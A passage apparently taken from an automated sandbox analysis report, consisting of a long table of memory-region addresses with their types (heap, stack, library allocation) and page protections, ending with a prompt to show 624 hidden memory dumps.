|
page read and write
|
||
18407ACC000
|
heap
|
page read and write
|
||
18407A77000
|
heap
|
page read and write
|
||
18407ACA000
|
heap
|
page read and write
|
||
2266CBB0000
|
heap
|
page read and write
|
||
18407B75000
|
heap
|
page read and write
|
||
22600C32000
|
trusted library allocation
|
page read and write
|
||
1840C7A0000
|
trusted library allocation
|
page read and write
|
||
184078D8000
|
heap
|
page read and write
|
||
18407E60000
|
trusted library allocation
|
page read and write
|
||
18407A82000
|
heap
|
page read and write
|
||
6F555BE000
|
stack
|
page read and write
|
||
2266CC7B000
|
heap
|
page read and write
|
||
1840CBB3000
|
trusted library allocation
|
page read and write
|
||
77A0F7E000
|
stack
|
page read and write
|
||
184078D7000
|
heap
|
page read and write
|
||
184078ED000
|
heap
|
page read and write
|
||
1FF75220000
|
remote allocation
|
page read and write
|
||
2266AECC000
|
heap
|
page read and write
|
||
A48077E000
|
stack
|
page read and write
|
||
1FF74F87000
|
trusted library allocation
|
page read and write
|
||
2266CBB4000
|
heap
|
page read and write
|
||
18407AA5000
|
heap
|
page read and write
|
||
2266C8B0000
|
trusted library allocation
|
page read and write
|
||
6F55BFB000
|
stack
|
page read and write
|
||
18407A42000
|
heap
|
page read and write
|
||
184078C9000
|
heap
|
page read and write
|
||
1FF74EE4000
|
trusted library allocation
|
page read and write
|
||
17C057EE000
|
heap
|
page read and write
|
||
18407B75000
|
heap
|
page read and write
|
||
2266B040000
|
heap
|
page read and write
|
||
2266CCAA000
|
heap
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
1840C7B7000
|
heap
|
page read and write
|
||
18407DB0000
|
trusted library allocation
|
page read and write
|
||
2260008A000
|
trusted library allocation
|
page read and write
|
||
2266C8A0000
|
heap
|
page readonly
|
||
944A0FF000
|
stack
|
page read and write
|
||
A4807FE000
|
stack
|
page read and write
|
||
18407390000
|
trusted library allocation
|
page read and write
|
||
1FF74E00000
|
trusted library allocation
|
page read and write
|
||
2266CBC9000
|
heap
|
page read and write
|
||
77A06FE000
|
unkown
|
page readonly
|
||
77A05FC000
|
stack
|
page read and write
|
||
18407A73000
|
heap
|
page read and write
|
||
18407B6F000
|
heap
|
page read and write
|
||
1840779C000
|
heap
|
page read and write
|
||
18407AD0000
|
heap
|
page read and write
|
||
77A187E000
|
unkown
|
page readonly
|
||
184077F3000
|
heap
|
page read and write
|
||
184079FB000
|
heap
|
page read and write
|
||
1FF74E98000
|
trusted library allocation
|
page read and write
|
||
22601861000
|
trusted library allocation
|
page read and write
|
||
17C06F4D000
|
heap
|
page read and write
|
||
77A02FE000
|
unkown
|
page readonly
|
||
1FF750F9000
|
heap
|
page read and write
|
||
7FFD9B91A000
|
trusted library allocation
|
page read and write
|
||
184077EB000
|
heap
|
page read and write
|
||
6F5644F000
|
stack
|
page read and write
|
||
2266C915000
|
heap
|
page read and write
|
||
17C05450000
|
heap
|
page read and write
|
||
1FF74F20000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
184073B8000
|
trusted library allocation
|
page read and write
|
||
1FF750DE000
|
heap
|
page read and write
|
||
2266CBBB000
|
heap
|
page read and write
|
||
1FF6FABE000
|
heap
|
page read and write
|
||
1FF7501F000
|
heap
|
page read and write
|
||
184077C7000
|
heap
|
page read and write
|
||
184078AE000
|
heap
|
page read and write
|
||
2266AE67000
|
heap
|
page read and write
|
||
184079A0000
|
trusted library allocation
|
page execute
|
||
7DF4324B0000
|
trusted library allocation
|
page readonly
|
||
1FF70313000
|
heap
|
page read and write
|
||
77A127E000
|
stack
|
page read and write
|
||
77A15FE000
|
unkown
|
page readonly
|
||
1FF74F60000
|
trusted library allocation
|
page read and write
|
||
17C055D9000
|
heap
|
page read and write
|
||
1FF75100000
|
heap
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
2266CBBF000
|
heap
|
page read and write
|
||
1FF750F3000
|
heap
|
page read and write
|
||
184078AE000
|
heap
|
page read and write
|
||
77A0DFE000
|
unkown
|
page readonly
|
||
77A1BFA000
|
stack
|
page read and write
|
||
18407925000
|
trusted library allocation
|
page read and write
|
||
18407B6F000
|
heap
|
page read and write
|
||
1FF708D0000
|
trusted library section
|
page readonly
|
||
1840C807000
|
heap
|
page read and write
|
||
18407A66000
|
heap
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
184078A8000
|
heap
|
page read and write
|
||
1DE6B460000
|
heap
|
page read and write
|
||
2266AF3C000
|
heap
|
page read and write
|
||
18407AB9000
|
heap
|
page read and write
|
||
1840799E000
|
trusted library allocation
|
page read and write
|
||
2266D120000
|
heap
|
page read and write
|
||
22601680000
|
trusted library allocation
|
page read and write
|
||
184078AE000
|
heap
|
page read and write
|
||
18407D30000
|
trusted library allocation
|
page read and write
|
||
184079C0000
|
heap
|
page readonly
|
||
944A17F000
|
stack
|
page read and write
|
||
1FF74E70000
|
trusted library allocation
|
page read and write
|
||
18407ACC000
|
heap
|
page read and write
|
||
17C06E1E000
|
heap
|
page read and write
|
||
17C057E5000
|
heap
|
page read and write
|
||
17C0554D000
|
heap
|
page read and write
|
||
22601632000
|
trusted library allocation
|
page read and write
|
||
184077BF000
|
heap
|
page read and write
|
||
7FFD9B762000
|
trusted library allocation
|
page read and write
|
||
1FF6FA66000
|
heap
|
page read and write
|
||
77A0D7E000
|
stack
|
page read and write
|
||
18407E30000
|
trusted library allocation
|
page read and write
|
||
184077C1000
|
heap
|
page read and write
|
||
18407B77000
|
heap
|
page read and write
|
||
2266CBA0000
|
heap
|
page execute and read and write
|
||
18407B6F000
|
heap
|
page read and write
|
||
18407D20000
|
trusted library allocation
|
page read and write
|
||
1FF6FB02000
|
heap
|
page read and write
|
||
184078AE000
|
heap
|
page read and write
|
||
1FF74F50000
|
trusted library allocation
|
page read and write
|
||
18407A73000
|
heap
|
page read and write
|
||
18407721000
|
heap
|
page read and write
|
||
22600232000
|
trusted library allocation
|
page read and write
|
||
17C05470000
|
heap
|
page read and write
|
||
2266AE9E000
|
heap
|
page read and write
|
||
2266CAF0000
|
heap
|
page read and write
|
||
1DE6B380000
|
heap
|
page read and write
|
||
6F5664C000
|
stack
|
page read and write
|
||
18407B77000
|
heap
|
page read and write
|
||
17C05510000
|
heap
|
page read and write
|
||
2266D040000
|
heap
|
page read and write
|
||
77A0EFE000
|
unkown
|
page readonly
|
||
1FF6F8A0000
|
heap
|
page read and write
|
||
2266CBB8000
|
heap
|
page read and write
|
||
18407B53000
|
heap
|
page read and write
|
||
2266CC45000
|
heap
|
page read and write
|
||
7DF4324A0000
|
trusted library allocation
|
page readonly
|
||
7FFD9B816000
|
trusted library allocation
|
page read and write
|
||
2266C890000
|
trusted library allocation
|
page read and write
|
||
18407DD8000
|
trusted library allocation
|
page read and write
|
||
2266CBBD000
|
heap
|
page read and write
|
||
7FFD9B763000
|
trusted library allocation
|
page execute and read and write
|
||
1FF6F9E0000
|
trusted library section
|
page read and write
|
||
1FF6FAA7000
|
heap
|
page read and write
|
||
1840738D000
|
trusted library allocation
|
page read and write
|
||
1FF74EC0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
18407E88000
|
trusted library allocation
|
page read and write
|
||
17C057A0000
|
heap
|
page read and write
|
||
18407A70000
|
heap
|
page read and write
|
||
1FF74F74000
|
trusted library allocation
|
page read and write
|
||
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
1840C804000
|
heap
|
page read and write
|
||
1FF708C0000
|
trusted library section
|
page readonly
|
||
A4808F7000
|
stack
|
page read and write
|
||
184077B1000
|
heap
|
page read and write
|
||
2266B085000
|
heap
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
18407A42000
|
heap
|
page read and write
|
||
184077C7000
|
heap
|
page read and write
|
||
1FF6FA2F000
|
heap
|
page read and write
|
||
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
184073A9000
|
trusted library allocation
|
page read and write
|
||
77A1AFE000
|
unkown
|
page readonly
|
||
1FF74F9A000
|
trusted library allocation
|
page read and write
|
||
1FF6FA3F000
|
heap
|
page read and write
|
||
7DF4324B1000
|
trusted library allocation
|
page execute read
|
||
18407AB9000
|
heap
|
page read and write
|
||
18407BE7000
|
heap
|
page read and write
|
||
1840742A000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
1FF750C1000
|
heap
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
1840C7A0000
|
trusted library allocation
|
page read and write
|
||
1FF7510B000
|
heap
|
page read and write
|
||
18407981000
|
trusted library allocation
|
page read and write
|
||
18407E7C000
|
trusted library allocation
|
page read and write
|
||
184078A8000
|
heap
|
page read and write
|
||
18407AC3000
|
heap
|
page read and write
|
||
A480979000
|
stack
|
page read and write
|
||
18407B38000
|
heap
|
page read and write
|
||
77A0E7E000
|
stack
|
page read and write
|
||
184073BD000
|
trusted library allocation
|
page read and write
|
||
184078B0000
|
heap
|
page read and write
|
||
22610001000
|
trusted library allocation
|
page read and write
|
||
184078D1000
|
heap
|
page read and write
|
||
2266D360000
|
heap
|
page read and write
|
||
A480BFE000
|
stack
|
page read and write
|
||
17C06F40000
|
heap
|
page read and write
|
||
18407B2C000
|
heap
|
page read and write
|
||
18407A73000
|
heap
|
page read and write
|
||
18407BE7000
|
heap
|
page read and write
|
||
1FF74EB0000
|
trusted library allocation
|
page read and write
|
||
22601991000
|
trusted library allocation
|
page read and write
|
||
1FF74F7C000
|
trusted library allocation
|
page read and write
|
||
1FF70202000
|
heap
|
page read and write
|
||
1FF74E8E000
|
trusted library allocation
|
page read and write
|
||
1FF6FA0B000
|
heap
|
page read and write
|
||
184078B6000
|
heap
|
page read and write
|
||
6F558F3000
|
stack
|
page read and write
|
||
1FF708A0000
|
trusted library section
|
page readonly
|
||
77A177E000
|
stack
|
page read and write
|
||
184078A7000
|
heap
|
page read and write
|
||
1FF74ECD000
|
trusted library allocation
|
page read and write
|
||
17C054E0000
|
trusted library allocation
|
page read and write
|
||
2266AE47000
|
heap
|
page read and write
|
||
18407E84000
|
trusted library allocation
|
page read and write
|
||
1FF70740000
|
trusted library allocation
|
page read and write
|
||
77A0FFE000
|
unkown
|
page readonly
|
||
18407AA5000
|
heap
|
page read and write
|
||
1FF708F0000
|
trusted library section
|
page readonly
|
||
77A18FE000
|
unkown
|
page readonly
|
||
18407A89000
|
heap
|
page read and write
|
||
18407839000
|
heap
|
page read and write
|
||
17C06E00000
|
heap
|
page read and write
|
||
7DF4E5230000
|
trusted library allocation
|
page execute and read and write
|
||
1FF6F9A0000
|
heap
|
page read and write
|
||
17C0551E000
|
heap
|
page read and write
|
||
1FF70E00000
|
trusted library allocation
|
page read and write
|
||
7FFD9B81C000
|
trusted library allocation
|
page execute and read and write
|
||
18407449000
|
trusted library allocation
|
page read and write
|
||
1FF75060000
|
heap
|
page read and write
|
||
2266C953000
|
trusted library allocation
|
page read and write
|
||
1FF74EC4000
|
trusted library allocation
|
page read and write
|
||
1FF6FAB5000
|
heap
|
page read and write
|
||
1FF6FAA1000
|
heap
|
page read and write
|
||
18407CF0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
18407AD0000
|
heap
|
page read and write
|
||
184077BA000
|
heap
|
page read and write
|
||
17C06E4F000
|
heap
|
page read and write
|
||
184079DE000
|
trusted library allocation
|
page read and write
|
||
18407BEE000
|
heap
|
page read and write
|
||
1840C212000
|
trusted library allocation
|
page read and write
|
||
184073A6000
|
trusted library allocation
|
page read and write
|
||
184078E9000
|
heap
|
page read and write
|
||
2266AE84000
|
heap
|
page read and write
|
||
18407E8C000
|
trusted library allocation
|
page read and write
|
||
184078B5000
|
heap
|
page read and write
|
||
18407BF6000
|
trusted library allocation
|
page read and write
|
||
18407E50000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
22610074000
|
trusted library allocation
|
page read and write
|
||
18407E5C000
|
trusted library allocation
|
page read and write
|
||
2266C830000
|
heap
|
page read and write
|
||
18407A89000
|
heap
|
page read and write
|
||
1FF750C9000
|
heap
|
page read and write
|
||
779FE7B000
|
stack
|
page read and write
|
||
18407932000
|
trusted library allocation
|
page read and write
|
||
1FF6FB28000
|
heap
|
page read and write
|
||
1FF74FD0000
|
trusted library allocation
|
page read and write
|
||
A4805FE000
|
stack
|
page read and write
|
||
7FFD9B7BC000
|
trusted library allocation
|
page execute and read and write
|
||
1FF74EF2000
|
trusted library allocation
|
page read and write
|
||
184078AE000
|
heap
|
page read and write
|
||
184077B1000
|
heap
|
page read and write
|
||
2266AE65000
|
heap
|
page read and write
|
||
1FF6FA2B000
|
heap
|
page read and write
|
||
1FF6FA91000
|
heap
|
page read and write
|
||
1FF6FA13000
|
heap
|
page read and write
|
||
77A0AFE000
|
unkown
|
page readonly
|
||
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
1FF75220000
|
remote allocation
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
18407A2A000
|
heap
|
page read and write
|
||
18407B53000
|
heap
|
page read and write
|
||
A480C7C000
|
stack
|
page read and write
|
||
77A09FC000
|
stack
|
page read and write
|
||
1DE6B6F0000
|
heap
|
page read and write
|
||
1FF74F7F000
|
trusted library allocation
|
page read and write
|
||
1FF74F0E000
|
trusted library allocation
|
page read and write
|
||
1FF74FD0000
|
trusted library allocation
|
page read and write
|
||
184077F0000
|
heap
|
page read and write
|
||
1840C7B0000
|
heap
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
1FF701F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
1840C80E000
|
heap
|
page read and write
|
||
A480473000
|
stack
|
page read and write
|
||
18407E80000
|
trusted library allocation
|
page read and write
|
||
1FF74F50000
|
trusted library allocation
|
page read and write
|
||
18407BF0000
|
trusted library allocation
|
page read and write
|
||
18407ACE000
|
heap
|
page read and write
|
||
1840C7C0000
|
trusted library allocation
|
page read and write
|
||
18407874000
|
heap
|
page read and write
|
||
1FF74E80000
|
trusted library allocation
|
page read and write
|
||
17C06E24000
|
heap
|
page read and write
|
||
2266AF12000
|
heap
|
page read and write
|
||
6F55FFE000
|
stack
|
page read and write
|
||
18407E98000
|
trusted library allocation
|
page read and write
|
||
18407BEB000
|
heap
|
page read and write
|
||
17C055C4000
|
heap
|
page read and write
|
||
184078B5000
|
heap
|
page read and write
|
||
18407921000
|
trusted library allocation
|
page read and write
|
||
184078E1000
|
heap
|
page read and write
|
||
1FF74E95000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
18407A6D000
|
heap
|
page read and write
|
||
22601C6B000
|
trusted library allocation
|
page read and write
|
||
18407871000
|
heap
|
page read and write
|
||
184077F0000
|
heap
|
page read and write
|
||
18407B53000
|
heap
|
page read and write
|
||
1FF6F9D0000
|
trusted library allocation
|
page read and write
|
||
22610080000
|
trusted library allocation
|
page read and write
|
||
18407B2C000
|
heap
|
page read and write
|
||
18407B77000
|
heap
|
page read and write
|
||
1FF74F68000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
944A07B000
|
stack
|
page read and write
|
||
18407820000
|
heap
|
page read and write
|
||
1FF701C1000
|
trusted library allocation
|
page read and write
|
||
184077ED000
|
heap
|
page read and write
|
||
1FF6FA5C000
|
heap
|
page read and write
|
||
184073D7000
|
trusted library allocation
|
page read and write
|
||
1FF6FA6F000
|
heap
|
page read and write
|
||
6F5674B000
|
stack
|
page read and write
|
||
77A157E000
|
stack
|
page read and write
|
||
18407710000
|
remote allocation
|
page read and write
|
||
2266D162000
|
heap
|
page read and write
|
||
2266D13C000
|
heap
|
page read and write
|
||
77A16F9000
|
stack
|
page read and write
|
||
18407400000
|
trusted library allocation
|
page read and write
|
||
2266CC79000
|
heap
|
page read and write
|
||
17C06E18000
|
heap
|
page read and write
|
||
1840C80D000
|
heap
|
page read and write
|
||
1FF74EEC000
|
trusted library allocation
|
page read and write
|
||
A480A7F000
|
stack
|
page read and write
|
||
184077EB000
|
heap
|
page read and write
|
||
184078B6000
|
heap
|
page read and write
|
||
18407B4C000
|
heap
|
page read and write
|
||
2266B020000
|
heap
|
page read and write
|
||
18407ACA000
|
heap
|
page read and write
|
||
2266AE8A000
|
heap
|
page read and write
|
||
22600001000
|
trusted library allocation
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
1FF708E0000
|
trusted library section
|
page readonly
|
||
A4809F7000
|
stack
|
page read and write
|
||
A48067C000
|
stack
|
page read and write
|
||
1FF6FA6C000
|
heap
|
page read and write
|
||
18407358000
|
trusted library allocation
|
page read and write
|
||
18407BEB000
|
heap
|
page read and write
|
||
18407BEE000
|
heap
|
page read and write
|
||
1DE6B500000
|
heap
|
page read and write
|
||
2266AE88000
|
heap
|
page read and write
|
||
17C05370000
|
heap
|
page read and write
|
||
184078CD000
|
heap
|
page read and write
|
||
18407B4C000
|
heap
|
page read and write
|
||
18408760000
|
trusted library allocation
|
page execute
|
||
18407A6D000
|
heap
|
page read and write
|
||
184073FB000
|
trusted library allocation
|
page read and write
|
||
77A08FE000
|
unkown
|
page readonly
|
||
184078B6000
|
heap
|
page read and write
|
||
77A04FE000
|
unkown
|
page readonly
|
||
18407AC3000
|
heap
|
page read and write
|
||
1FF70401000
|
trusted library allocation
|
page read and write
|
||
77A117E000
|
stack
|
page read and write
|
||
184073CE000
|
trusted library allocation
|
page read and write
|
||
18407710000
|
remote allocation
|
page read and write
|
||
1FF74FC0000
|
trusted library allocation
|
page read and write
|
||
A480878000
|
stack
|
page read and write
|
||
1FF74EEF000
|
trusted library allocation
|
page read and write
|
||
1840C7A0000
|
trusted library allocation
|
page read and write
|
||
1FF7502C000
|
heap
|
page read and write
|
||
1FF70200000
|
heap
|
page read and write
|
||
1840C7B2000
|
heap
|
page read and write
|
||
1840788B000
|
heap
|
page read and write
|
||
1FF75102000
|
heap
|
page read and write
|
||
1FF74FE0000
|
trusted library allocation
|
page read and write
|
||
18407851000
|
heap
|
page read and write
|
||
184077BA000
|
heap
|
page read and write
|
||
1FF74ED6000
|
trusted library allocation
|
page read and write
|
||
184077BF000
|
heap
|
page read and write
|
||
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
18407789000
|
heap
|
page read and write
|
||
18407B75000
|
heap
|
page read and write
|
||
1FF6F8C0000
|
heap
|
page read and write
|
||
2266CC0D000
|
heap
|
page read and write
|
||
18407743000
|
heap
|
page read and write
|
||
18407BE7000
|
heap
|
page read and write
|
||
1840799B000
|
trusted library allocation
|
page read and write
|
||
18407A00000
|
heap
|
page read and write
|
||
226101B7000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
22601863000
|
trusted library allocation
|
page read and write
|
||
18407A4A000
|
heap
|
page read and write
|
||
1840C710000
|
trusted library allocation
|
page read and write
|
||
17C055E8000
|
heap
|
page read and write
|
||
1840776B000
|
heap
|
page read and write
|
||
2266AE40000
|
heap
|
page read and write
|
||
22601D30000
|
trusted library allocation
|
page read and write
|
||
2266AE8C000
|
heap
|
page read and write
|
||
1FF70302000
|
heap
|
page read and write
|
||
184078C7000
|
heap
|
page read and write
|
||
1FF750EF000
|
heap
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
1DE6B6F5000
|
heap
|
page read and write
|
||
2266CC42000
|
heap
|
page read and write
|
||
18407411000
|
trusted library allocation
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
1840782A000
|
heap
|
page read and write
|
||
A48164E000
|
stack
|
page read and write
|
||
1FF74F23000
|
trusted library allocation
|
page read and write
|
||
77A22FE000
|
unkown
|
page readonly
|
There are 624 hidden memdumps, click here to show them.